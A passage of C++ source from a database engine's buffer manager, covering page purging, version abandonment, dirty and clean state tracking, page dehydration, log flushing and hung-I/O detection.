g_critBFDepend.Enter();
for ( PBF pbfAbandon = pbf->pbfTimeDepChainNext; pbfAbandon != pbfNil; )
{
if ( pbfAbandon->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( !pbfAbandon->fAbandoned )
{
pbfAbandon->sxwl.UpgradeExclusiveLatchToWriteLatch();
pbfAbandon->fAbandoned = fTrue;
pbfAbandon->sxwl.ReleaseWriteLatch();
}
else
{
pbfAbandon->sxwl.ReleaseExclusiveLatch();
}
// Next in the chain.
pbfAbandon = pbfAbandon->pbfTimeDepChainNext;
}
else
{
// Avoid deadlocks.
g_critBFDepend.Leave();
UtilSleep( dtickFastRetry );
g_critBFDepend.Enter();
// Reset enumeration because we left the g_critBFDepend for an instant.
pbfAbandon = pbf->pbfTimeDepChainNext;
}
}
g_critBFDepend.Leave();
// Loop until we have evicted all versions.
while ( fTrue )
{
EnforceSz( pbf->fAbandoned, "PurgeAllCurNotAbandoned" );
EnforceSz( pbf->fCurrentVersion, "PurgeAllCurNotCurrent" );
EnforceSz( !pbf->fOlderVersion, "PurgeAllCurOlder" );
g_critBFDepend.Enter();
if ( pbf->pbfTimeDepChainNext != pbfNil )
{
// Find the oldest version to purge.
BF* pbfVersion = PbfBFIGetFlushOrderLeaf( pbf, fFalse );
Assert( ( pbfVersion != pbfNil ) && ( pbfVersion != pbf ) );
const BOOL fVersionLatched = pbfVersion->sxwl.ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errSuccess;
g_critBFDepend.Leave();
if ( fVersionLatched )
{
EnforceSz( pbfVersion->fAbandoned, "PurgeAllVerNotAbandoned" );
EnforceSz( !pbfVersion->fCurrentVersion, "PurgeAllVerCurrent" );
EnforceSz( pbfVersion->fOlderVersion, "PurgeAllVerNotOlder" );
BFIPurgePage( pbfVersion, pbfVersion->ifmp, pbfVersion->pgno, bfltWrite, BFEvictFlags( bfefReasonPurgePage | bfefEvictDirty ) );
pbfVersion = pbfNil;
}
}
else
{
g_critBFDepend.Leave();
}
g_critBFDepend.Enter();
if ( pbf->pbfTimeDepChainNext == pbfNil )
{
g_critBFDepend.Leave();
BFIPurgePage( pbf, pbf->ifmp, pbf->pgno, bfltWrite, BFEvictFlags( bfefReasonPurgePage | bfefEvictDirty ) );
pbf = pbfNil;
break;
}
else
{
g_critBFDepend.Leave();
}
}
pbfl->pv = NULL;
pbfl->dwContext = NULL;
}
// Purges the current abandoned page version of a new page. The buffer passed in must be the
// current version and must be abandoned. It will be purged and not written out, even if
// dirty. It was designed to purge dirty new pages upon failure to complete the original
// operation which new'd the page in the first place, so we don't end up with a page in
// the database with a logged checksum and dbtime which will mismatch the page on the
// passive side on replicated systems, therefore causing DB divergence to flag the discrepancy.
void BFIPurgeNewPage( _Inout_ const PBF pbf, const TraceContext& tc )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
EnforceSz( pbf->fAbandoned, "PurgeAbandonedVerNotAbandoned" );
EnforceSz( pbf->fCurrentVersion, "PurgeAbandonedVerNotCurrent" );
EnforceSz( !pbf->fOlderVersion, "PurgeAbandonedVerOlder" );
g_critBFDepend.Enter();
EnforceSz( ( pbf->pbfTimeDepChainNext == pbfNil ) &&
( pbf->pbfTimeDepChainPrev == pbfNil ), "PurgeAbandonedVerTooManyVersions" );
g_critBFDepend.Leave();
OnDebug( const IFMP ifmp = pbf->ifmp );
OnDebug( const PGNO pgno = pbf->pgno );
BFIPurgePage( pbf, pbf->ifmp, pbf->pgno, bfltWrite, BFEvictFlags( bfefReasonPurgePage | bfefEvictDirty ) );
Assert( !FBFInCache( ifmp, pgno ) );
}
// Purges a page from the cache. The latch is always released.
void BFIPurgePage(
_Inout_ const PBF pbf,
_In_ const IFMP ifmpCheck,
_In_ const PGNO pgnoCheck,
_In_ const BFLatchType bfltHave,
_In_ const BFEvictFlags bfefDangerousOptions )
{
Assert( ( bfltHave == bfltMax ) || ( bfltHave == bfltWrite ) );
Assert( ( bfltHave == bfltMax ) || pbf->sxwl.FOwnWriteLatch() );
Assert( ( bfltHave == bfltMax ) || ( ( pbf->ifmp == ifmpCheck ) && ( pbf->pgno == pgnoCheck ) ) );
Assert( ( bfefDangerousOptions & bfefEvictDirty ) != 0 );
BOOL fLatched = ( bfltHave != bfltMax );
const BOOL fAllowTearDownClean = ( 0 != ( bfefDangerousOptions & bfefAllowTearDownClean ) );
while ( fTrue )
{
// Check if page changed under us. We must not require a latch to check because the page might be in a
// condition that will never give up the latch (e.g., page is in the avail pool).
if ( ( pbf->ifmp != ifmpCheck ) || ( pbf->pgno != pgnoCheck ) )
{
break;
}
if ( !fLatched )
{
// It's safe do de-reference the unlatched pbf here because we never de-allocate the BF array,
// except for when we are terminating the buffer manager.
const CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireWriteLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
fLatched = fTrue;
}
else
{
Assert( errSXWL == CSXWLatch::ERR::errLatchConflict );
UtilSleep( dtickFastRetry );
continue;
}
}
// Check if page changed under us now that we have the latch.
if ( ( pbf->ifmp != ifmpCheck ) || ( pbf->pgno != pgnoCheck ) )
{
break;
}
if ( pbf->err == wrnBFPageFlushPending &&
ErrBFIWriteSignalState( pbf ) == wrnBFPageFlushPending )
{
// The IO thread hasn't signaled the IO completed yet.
BFIReleaseSXWL( pbf, bfltWrite );
fLatched = fFalse;
UtilSleep( dtickFastRetry );
continue;
}
Assert( pbf->err != wrnBFPageFlushPending ||
ErrBFIWriteSignalState( pbf ) != wrnBFPageFlushPending ); // all IO should be complete ...
// Complete the flush if necessary ...
if ( pbf->err == wrnBFPageFlushPending &&
!FBFICompleteFlushPage( pbf, bfltWrite, fFalse, fFalse, fAllowTearDownClean ) )
{
AssertSz( fFalse, "In BFPurge() couldn't, complete write IO!" );
}
Assert( FBFIUpdatablePage( pbf ) );
// cancel any pending patch requests
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing ) )
{
Assert( FBFIOwnsLatchType( pbf, bfltExclusive ) || FBFIOwnsLatchType( pbf, bfltWrite ) );
PagePatching::CancelPatchRequest( pbf->ifmp, pbf->pgno );
}
// lock this BF in the LRUK in preparation for a possible eviction
BFLRUK::CLock lockLRUK;
g_bflruk.LockResourceForEvict( pbf, &lockLRUK );
// mark this BF as "newly evicted" so that when it is actually evicted
// we will mark it as not "newly evicted". this will make it so that
// purged pages do not cause cache growth when they are reused
pbf->fNewlyEvicted = fTrue;
// release our latch. we do not have to worry about
// the page being evicted because we have the LRUK locked
BFIReleaseSXWL( pbf, bfltWrite );
fLatched = fFalse;
// try to evict this page
const ERR errEvict = ErrBFIEvictPage( pbf, &lockLRUK, bfefDangerousOptions );
// unlock the LRUK
g_bflruk.UnlockResourceForEvict( &lockLRUK );
// we failed to evict this page
if ( errEvict < JET_errSuccess )
{
ExpectedSz( errEvict == errBFIPageDirty ||
errEvict == errBFIPageFlushPending ||
errEvict == errBFIPageFlushPendingSlowIO ||
errEvict == errBFIPageFlushPendingHungIO ||
errEvict == errBFIPageFaultPending ||
errEvict == errBFIPageFaultPendingHungIO ||
errEvict == errBFLatchConflict, "Unknown errEvict=%d.", errEvict );
UtilSleep( dtickFastRetry );
continue;
}
else
{
break;
}
}
if ( fLatched )
{
BFIReleaseSXWL( pbf, bfltWrite );
fLatched = fFalse;
}
}
void BFIRenouncePage( _Inout_ PBF pbf, _In_ const BOOL fRenounceDirty )
{
// validate IN args
Assert( pbf->sxwl.FOwnWriteLatch() );
// the BF is not undergoing write-IO ...
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
// the BF is clean or we can renounce dirty BFs (unless there are older versions)
if ( ( pbf->bfdf == bfdfClean ) ||
( fRenounceDirty && pbfNil == pbf->pbfTimeDepChainNext ) )
{
if ( fRenounceDirty )
{
Assert( !FBFIDatabasePage( pbf ) );
}
if ( JET_errSuccess <= ErrBFIEvictRemoveCleanVersions( pbf ) )
{
// just mark this BF as clean to prevent any data from being flushed.
// we will allow the clean thread to evict it later. this will delay
// freeing the BF but will be more scalable
Enforce( pbf->pbfTimeDepChainPrev == NULL );
Enforce( pbf->pbfTimeDepChainNext == NULL );
BFICleanPage( pbf, bfltWrite );
}
}
// mark this BF as "newly evicted" so that when it is actually evicted
// we will mark it as not "newly evicted". this will make it so that
// renounced pages do not cause cache growth when they are reused
pbf->fNewlyEvicted = fTrue;
}
const CHAR mpbfdfsz[ bfdfMax - bfdfMin ][ 16 ] =
{
"bfdfClean",
"bfdfUntidy",
"bfdfDirty",
"bfdfFilthy",
};
C_ASSERT( _countof( mpbfdfsz ) == bfdfFilthy + 1 );
C_ASSERT( _countof( mpbfdfsz ) == bfdfMax );
// Marks the given WAR Latched or Write Latched page as dirty. This means
// that the given buffer for this page contains changes that should be written
// to disk. The degree of dirtiness is specified by the given dirty flags.
// A page can only be made more dirty. Trying to make a page less dirty than
// it currently is will have no effect.
void BFIDirtyPage( PBF pbf, BFDirtyFlags bfdf, const TraceContext& tc )
{
Assert( bfdfClean < bfdf ); // don't just call us for fun
Assert( !g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach ); // don't dirty page on R/O DB
// the BF is clean
if ( pbf->bfdf == bfdfClean )
{
// reset the BF's lgposOldestBegin0
//
// NOTE: we usually do this during Idle Flush or Checkpoint
// Advancement. However, we must do this on DirtyPage to handle the
// case where a BF has been written out, its lgposOldestBegin0 hasn't
// been reset, and then the BF is dirtied again with a more recent
// lgposOldestBegin0. if we didn't do this then a frequently dirtied
// page could impede the checkpoint indefinitely
BFIResetLgposOldestBegin0( pbf );
// reset the error state of the BF
//
// NOTE: this is to handle the case where we want to modify a page
// that was latched with bflfNoFaultFail. we want a chance to write our
// changes to the page
pbf->err = JET_errSuccess;
}
// keep track of dirties on this thread
if ( bfdf <= bfdfUntidy )
{
if ( pbf->bfdf < bfdfUntidy )
{
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "Untidied page=[0x%x:0x%x], tcd=%d", (ULONG)pbf->ifmp, pbf->pgno, pbf->tce ) );
}
}
else if ( bfdf >= bfdfDirty )
{
// note: we don't track untidies in "dirty" stats, because they are not real dirties.
// Trace that we intended to dirty the page
BFITraceDirtyPage( pbf, bfdf, tc );
Assert( pbf->pgno <= g_rgfmp[pbf->ifmp].PgnoLast() ||
g_rgfmp[pbf->ifmp].FBeyondPgnoShrinkTarget( pbf->pgno ) ||
g_rgfmp[pbf->ifmp].FOlderDemandExtendDb() );
g_rgfmp[pbf->ifmp].UpdatePgnoDirtiedMax( pbf->pgno );
TLS* const ptls = Ptls();
if ( pbf->bfdf < bfdfDirty )
{
// note: we count untidy as clean, as the user probably didn't do anything
// to make the page untidy.
ptls->threadstats.cPageDirtied++;
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManagerBufferDirtyState,
OSFormat( "Dirtied page=[0x%x:0x%x] from %hs, tce=%d", (ULONG)pbf->ifmp, pbf->pgno, mpbfdfsz[ pbf->bfdf ], pbf->tce ) );
PERFOpt( cBFDirtied.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
ptls->threadstats.cPageRedirtied++;
// "Filthied" will only be logged once on transition from dirty to filthy. "Re-dirtied" covers re-filthied here (but its not an important state change).
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "%hs page=[0x%x:0x%x], tce=%d", ( bfdf == bfdfDirty && pbf->bfdf == bfdfDirty ) ? "Re-dirtied" : "Filthied", (ULONG)pbf->ifmp, pbf->pgno, pbf->tce ) );
PERFOpt( cBFDirtiedRepeatedly.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
// track unique modified pages
const TICK tickLastDirtiedBefore = pbf->tickLastDirtied;
const TICK tickLastDirtiedAfter = pbf->tickLastDirtied = TickOSTimeCurrent();
Assert( TickCmp( tickLastDirtiedAfter, tickLastDirtiedBefore ) >= 0 );
const BOOL fUpdateThreadStats = ( TickCmp( tickLastDirtiedBefore, ptls->TickThreadStatsLast() ) <= 0 );
if ( fUpdateThreadStats )
{
ptls->threadstats.cPageUniqueModified++;
}
}
Enforce( pbf->pbfTimeDepChainPrev == NULL );
// make this BF dirtier
if ( pbf->bfdf < bfdfDirty && bfdf >= bfdfDirty )
{
AtomicDecrement( (LONG*)&g_cbfCacheClean );
}
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
if ( ( bfdf >= bfdfDirty ) && BoolParam( JET_paramEnableFileCache ) && pbf->fCurrentVersion )
{
Expected( !pbf->fOlderVersion );
BFITouchResource( pbf, bfltExclusive, bflfDefault, fTrue, g_pctCachePriorityNeutral, tc );
}
pbf->bfdf = BYTE( max( pbf->bfdf, bfdf ) );
Assert( pbf->bfdf == max( pbf->bfdf, bfdf ) );
}
// Between two clean pages (or dirty pages if fTearDownFMP is set) this is essentially
// the logical inverse of ErrBFIVersionPage / aka it "unversions a page".
void BFICleanVersion( PBF pbf, BOOL fTearDownFMP )
{
Assert( g_critBFDepend.FOwner() );
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// remove every BF above us and ourself from the time dependency chain
//
// NOTE: we should not be dependent on anyone else if we were flushed.
// the generality of this code is aimed at handling the purging of BFs
// that are in an error state before crashing the system and forcing a
// recovery due to an I/O error on the database or log files
Assert( !pbf->fOlderVersion || !pbf->fCurrentVersion );
if ( pbf->pbfTimeDepChainPrev != pbfNil ||
pbf->pbfTimeDepChainNext != pbfNil ||
pbf->bfbitfield.FDependentPurged() )
{
Enforce( pbf->pbfTimeDepChainNext == NULL || fTearDownFMP );
while ( pbf->pbfTimeDepChainPrev != pbfNil ||
pbf->pbfTimeDepChainNext != pbfNil )
{
// find a leaf of our branch in the time dependency chain
PBF pbfT = pbf;
while ( pbfT->pbfTimeDepChainNext != pbfNil )
{
pbfT = pbfT->pbfTimeDepChainNext;
Assert( pbfT->ifmp == pbf->ifmp ); // no cross-database dependencies allowed
}
// if this BF is part of a time dependency chain, remove it
if ( pbfT->pbfTimeDepChainPrev != pbfNil )
{
BF * const pbfDepT = pbfT->pbfTimeDepChainPrev;
pbfDepT->bfbitfield.SetFDependentPurged( pbfDepT->bfbitfield.FDependentPurged() || ( wrnBFPageFlushPending != pbf->err ) );
pbfDepT->pbfTimeDepChainNext = pbfNil;
pbfT->pbfTimeDepChainPrev = pbfNil;
Enforce( pbfT->pbfTimeDepChainNext == NULL ); // do not orphan ...
}
}
pbf->bfbitfield.SetFDependentPurged( fFalse );
// This BF is now clean, we can say it is not impeding the checkpoint
pbf->bfbitfield.SetFImpedingCheckpoint( fFalse );
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
}
}
// cleans a page in the buffer manager
void BFICleanPage( __inout PBF pbf, __in const BFLatchType bfltHave, __in const BFCleanFlags bfcf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
// we should only use this if we are purging a dirty context due to
// resource tear down.
const BOOL fTearDown = bfcfAllowTearDownClean & bfcf;
Enforce( pbf->err != errBFIPageFaultPending ); // should be true
//Enforce( pbf->err != wrnBFPageFlushPending ); // not true.
Enforce( pbf->pWriteSignalComplete == NULL ); // true because we reset the signal before BFICleanPage.
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
// remove every BF above us and ourself from the time dependency chain
//
if ( pbf->pbfTimeDepChainPrev != pbfNil ||
pbf->pbfTimeDepChainNext != pbfNil ||
pbf->bfbitfield.FDependentPurged() )
{
g_critBFDepend.Enter();
Enforce( pbf->pbfTimeDepChainNext == NULL || fTearDown );
BFICleanVersion( pbf, fTearDown );
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
g_critBFDepend.Leave();
}
// even if we weren't involved in a time dependency chain, removing fCheckpointImpeded
if ( pbf->bfbitfield.FImpedingCheckpoint() )
{
g_critBFDepend.Enter();
pbf->bfbitfield.SetFImpedingCheckpoint( fFalse );
g_critBFDepend.Leave();
}
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
// remove all undo info
if ( pbf->prceUndoInfoNext != prceNil )
{
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbf ) );
Assert( fTearDown );
while ( pbf->prceUndoInfoNext != prceNil )
{
BFIRemoveUndoInfo( pbf, pbf->prceUndoInfoNext );
}
}
// reset our lgposModify
BFIResetLgposModify( pbf );
pbf->rbsposSnapshot = rbsposMin;
// do NOT reset our lgposOldestBegin0
//
// NOTE: we usually do this during Idle Flush or Checkpoint
// Advancement. We must NOT reset this here because doing so could cause
// the I/O thread to deadlock with the Idle Flush or Checkpoint Advancement
// threads when it is processing a write completion. This deadlock only
// occurs because the I/O manager will block a thread attempting to issue
// an I/O when it has run out of IOREQs which, in turn, can only be
// replenished by the I/O thread
//
// HOWEVER: do request checkpoint depth maintenance to remove our entry
// from the OB0 index. we must do this so that the checkpoint will be
// properly updated if we go to a 100% clean cache for a given database
//BFIResetLgposOldestBegin0( pbf );
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
if ( CmpLgpos( pbf->lgposOldestBegin0, lgposMax ) )
{
BFIMaintCheckpointDepthRequest( pfmp, bfcpdmrRequestRemoveCleanEntries );
BFIMaintCheckpointRequest();
}
// reset our I/O error status
if ( pbf->ifmp != ifmpNil && // BF is holding a valid database page
PinstFromIfmp( pbf->ifmp ) ) // BF is holding a database page for an active instance
// (not retaining a page for a non-attached database)
{
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
pbf->err = JET_errSuccess;
// update our page write stats
if ( pbf->fFlushed )
{
pbf->fFlushed = fFalse;
}
pbf->fLazyIO = fFalse;
pbf->fSuspiciouslySlowRead = fFalse;
// make this BF clean (do this after removing ourself from the dependency
// tree to avoid asserting)
if ( pbf->bfdf >= bfdfDirty )
{
AtomicIncrement( (LONG*)&g_cbfCacheClean );
}
OSTraceFMP( pbf->ifmp, JET_tracetagBufferManagerBufferDirtyState,
OSFormat( "Cleaned page=[0x%x:0x%x] from %hs, tce=%d",
(ULONG)pbf->ifmp,
pbf->pgno,
mpbfdfsz[ pbf->bfdf ],
pbf->tce ) );
pbf->bfdf = bfdfClean;
// to save space, try to dehydrate the page if appropriate
if ( !fTearDown && // we're about to purge / evict this page
pbf->fCurrentVersion // older versions will be evicted fast, no need to compress
)
{
// we need the w-latch if we don't already have it
CSXWLatch::ERR errSXWL = CSXWLatch::ERR::errSuccess;
if ( bfltExclusive == bfltHave )
{
errSXWL = pbf->sxwl.ErrTryUpgradeExclusiveLatchToWriteLatch();
}
if ( CSXWLatch::ERR::errSuccess == errSXWL )
{
// dehydrate the page
BFIDehydratePage( pbf, bfcf & bfcfAllowReorganization );
if ( bfltExclusive == bfltHave )
{
// return ourselves to the previous latch state
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
}
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
}
// buffer hydration management
// this function dehydrates the page to the smallest size supported by the database engine / CPAGE.
void BFIDehydratePage( PBF pbf, __in const BOOL fAllowReorg )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// this protection is too strong, due to page patching code paths ...
// page patching calls ErrBFWriteLatch() with bflfNoFaultFail, which allows the API
// to succeed and return a page that is -1018 and write latched ... on unlatch
// we try to dehydrate and hit this code path with an err'd BF.
if ( pbf->err < JET_errSuccess )
{
// err'd BFs are not valid for dehydration
return;
}
if ( FBFICacheViewCacheDerefIo( pbf ) )
{
// just don't want to think about this...
return;
}
if ( !FBFIDatabasePage( pbf ) )
{
// We don't know how to dehydrate such pages yet, maybe someday.
return;
}
if ( pbf->bfdf > bfdfUntidy )
{
// For now, we only allow clean/untidy pages to be dehydrated
return;
}
if ( pbf->icbBuffer < icbPage4KB )
{
// For now, we can't handle 2KB pages
Assert( pbf->icbPage == icbPage2KB );
Assert( pbf->icbBuffer == icbPage2KB );
return;
}
// First we need to create a BFLatch that cpage thinks is real via rebuffering ...
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpage;
cpage.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// Is the page dehydratable ...
ULONG cbMinReqSize;
if ( cpage.FPageIsDehydratable( &cbMinReqSize, fAllowReorg ) )
{
// get the min required size of the page
ICBPage icbNewSize = max( icbPage4KB, IcbBFIBufferSize( cbMinReqSize ) );
Assert( cbMinReqSize <= (ULONG)g_rgcbPageSize[icbNewSize] );
if ( icbNewSize != pbf->icbBuffer )
{
// Do dehydration
OSTrace( JET_tracetagBufferManager, OSFormat( "Dehydrating Page %d:%d to %d bytes.\n", (ULONG)pbf->ifmp, pbf->pgno, g_rgcbPageSize[icbNewSize] ) );
cpage.DehydratePage( g_rgcbPageSize[icbNewSize], fAllowReorg );
PERFOpt( cBFPagesDehydrated.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// not needed because there would be latch associated with this
// ErrBFIMaintCacheStatsRequest( bfmcsrtNormal );
Assert( pbf->icbBuffer == icbNewSize );
}
}
}
// this function rehydrates a page to full size
void BFIRehydratePage( PBF pbf )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->icbBuffer != icbPage0 ); // re-hydration from zero comes from unquiescing buffers and should go
// through ErrBFISetBufferSize() when the page gets pulled from the avail pool.
if ( pbf->icbBuffer == pbf->icbPage )
{
// Yeah, we're done rehydrating already.
return;
}
// we should not have dehydrated a page for view cache.
Assert( !BoolParam( JET_paramEnableViewCache ) );
// we not have dehydrated non-DB pages shouldn't have been dehydrated
Assert( FBFIDatabasePage( pbf ) );
// First we need to create a BFLatch that cpage thinks is real via rebuffering ...
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpage;
cpage.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// Do rehydration
OSTrace( JET_tracetagBufferManager, OSFormat( "Rehydrating Page %d:%d from %d bytes.\n", (ULONG)pbf->ifmp, pbf->pgno, g_rgcbPageSize[pbf->icbBuffer] ) );
cpage.RehydratePage();
PERFOpt( cBFPagesRehydrated.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// not needed because there would be latch associated with this
// ErrBFIMaintCacheStatsRequest( bfmcsrtNormal );
// Validate success
Assert( pbf->icbBuffer == pbf->icbPage );
}
// Log I/O / Flush
// this function writes the log
ERR ErrBFIWriteLog( __in const IFMP ifmp, __in const BOOL fSync )
{
PIB pibFake;
pibFake.m_pinst = PinstFromIfmp( ifmp );
if ( fSync )
{
return ErrLGWaitForWrite( &pibFake, &lgposMax );
}
// else ...
return ErrLGWrite( &pibFake );
}
ERR ErrBFIFlushLog( __in const IFMP ifmp, __in const IOFLUSHREASON iofr, const BOOL fMayOwnBFLatch )
{
return ErrLGFlush( PinstFromIfmp( ifmp )->m_plog, iofr, fMayOwnBFLatch );
}
// I/O
const void* const PV_IO_CTX_LOCK = (void*)upMax;
void* PvBFIAcquireIOContext( PBF pbf )
{
void* pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
OSSYNC_FOREVER
{
// NULL context, no I/O currently happening, bail without locking and don't return any I/O context.
if ( pvIOContextOld == NULL )
{
return NULL;
}
// Locked, try again.
if ( pvIOContextOld == PV_IO_CTX_LOCK )
{
UtilSleep( 1 );
pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
continue;
}
// Try to lock the context.
void* const pvIOContextOldReplaced = AtomicCompareExchangePointer( &pbf->pvIOContext, pvIOContextOld, (void*)PV_IO_CTX_LOCK );
// Something changed on us.
if ( pvIOContextOldReplaced != pvIOContextOld )
{
pvIOContextOld = pvIOContextOldReplaced;
continue;
}
// Success.
Assert( AtomicReadPointer( &pbf->pvIOContext ) == PV_IO_CTX_LOCK );
Assert( ( pvIOContextOldReplaced != NULL ) && ( pvIOContextOldReplaced != PV_IO_CTX_LOCK ) );
return pvIOContextOldReplaced;
}
}
void BFIReleaseIOContext( PBF pbf, void* const pvIOContext )
{
Assert( pvIOContext != PV_IO_CTX_LOCK );
Expected( pvIOContext != NULL );
OnDebug( void* const pvIOContextOld = ) AtomicExchangePointer( &pbf->pvIOContext, pvIOContext );
Assert( pvIOContextOld == PV_IO_CTX_LOCK );
}
void BFISetIOContext( PBF pbf, void* const pvIOContextNew )
{
Assert( pvIOContextNew != PV_IO_CTX_LOCK );
Expected( pvIOContextNew != NULL );
OnDebug( void* const pvIOContextOld = ) AtomicExchangePointer( &pbf->pvIOContext, pvIOContextNew );
Assert( pvIOContextOld == NULL );
}
void BFIResetIOContext( PBF pbf )
{
void* pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
OSSYNC_FOREVER
{
Expected( pvIOContextOld != NULL );
// NULL context, bail.
if ( pvIOContextOld == NULL )
{
return;
}
// Locked, try again.
if ( pvIOContextOld == PV_IO_CTX_LOCK )
{
UtilSleep( 1 );
pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
continue;
}
void* const pvIOContextOldReplaced = AtomicCompareExchangePointer( &pbf->pvIOContext, pvIOContextOld, NULL );
// Something changed on us, try again.
if ( pvIOContextOldReplaced != pvIOContextOld )
{
pvIOContextOld = pvIOContextOldReplaced;
continue;
}
// Success.
Assert( ( pvIOContextOldReplaced != NULL ) && ( pvIOContextOldReplaced != PV_IO_CTX_LOCK ) );
return;
}
}
BOOL FBFIIsIOHung( PBF pbf )
{
void* const pvIOContext = PvBFIAcquireIOContext( pbf );
if ( pvIOContext == NULL )
{
return fFalse;
}
const BOOL fHung = ( PctBFIIsIOHung( pbf, pvIOContext ) >= 100 );
BFIReleaseIOContext( pbf, pvIOContext );
return fHung;
}
BYTE PctBFIIsIOHung( PBF pbf, void* const pvIOContext )
{
IFileAPI* const pfapi = g_rgfmp[ pbf->ifmp ].Pfapi();
const TICK dtickIOElapsed = pfapi->DtickIOElapsed( pvIOContext );
const TICK dtickHungIO = (TICK)UlParam( JET_paramHungIOThreshold );
if ( dtickIOElapsed >= dtickHungIO )
{
return 100;
}
else
{
return (BYTE)( ( (QWORD)dtickIOElapsed * 100 ) / dtickHungIO );
}
}
ERR ErrBFIFlushPendingStatus( PBF pbf )
{
ERR err = JET_errSuccess;
// WARNING: this function must always return one of the errBFIPageFlushPending*
// errors, even in cases where the acquired pvIOContext is NULL, which would indicate
// that the I/O is not pending anymore. That is because this function is consumed
// in places where the detemination that the I/O is pending has already been made and
// there are no sufficient locks held to ensure that the I/O has not transitioned to
// a completed state, so we better not change the decision that has been made in upper
// layers.
void* const pvIOContext = PvBFIAcquireIOContext( pbf );
if ( pvIOContext == NULL )
{
Error( ErrERRCheck( errBFIPageFlushPending ) );
}
const BYTE pctIOLatencyToHung = PctBFIIsIOHung( pbf, pvIOContext );
Expected( pctIOLatencyToHung <= 100 );
BFIReleaseIOContext( pbf, pvIOContext );
// Over 100% of the hung threshold, it's definitely hung.
if ( pctIOLatencyToHung >= 100 )
{
Error( ErrERRCheck( errBFIPageFlushPendingHungIO ) );
}
// Over 2% of the hung threshold, consider it slow.
if ( pctIOLatencyToHung >= 2 )
{
Error( ErrERRCheck( errBFIPageFlushPendingSlowIO ) );
}
err = ErrERRCheck( errBFIPageFlushPending );
HandleError:
Assert( ( err == errBFIPageFlushPending ) ||
( err == errBFIPageFlushPendingSlowIO ) ||
( err == errBFIPageFlushPendingHungIO ) );
return err;
}
void BFIPrepareReadPage( PBF pbf )
{
// declare I/O pending
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
ERR errT = ErrERRCheck( errBFIPageFaultPending );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
// hook for (upper layer) station ID
// a better place might be begin transaction, but it is called too frequently to risk its
// performance. if BF had a callout to ISAM / io fulfill a page, then this would be the
// perfect place for that.
g_rgfmp[ pbf->ifmp ].TraceStationId( tsidrPulseInfo );
}
void BFIPrepareWritePage( PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// we must have never gotten this far with an abandoned buffer.
EnforceSz( !pbf->fAbandoned, "PrepWriteAbandonedBf" );
// declare I/O pending
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
ERR errT = ErrERRCheck( wrnBFPageFlushPending );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
Enforce( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) <= 0 ); // just for insurance
Enforce( pbf->icbBuffer == pbf->icbPage );
IFMPPGNO ifmppgno = IFMPPGNO( pbf->ifmp, pbf->pgno );
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
PBF pbfT = pbfNil;
// we had better be writing the oldest version of this page and this page
// had better be reachable from the hash table or cache coherency problems
// can occur (e.g. writing version 3 of a page before version 2)
g_bfhash.ReadLockKey( ifmppgno, &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
Enforce( errHash == BFHash::ERR::errSuccess );
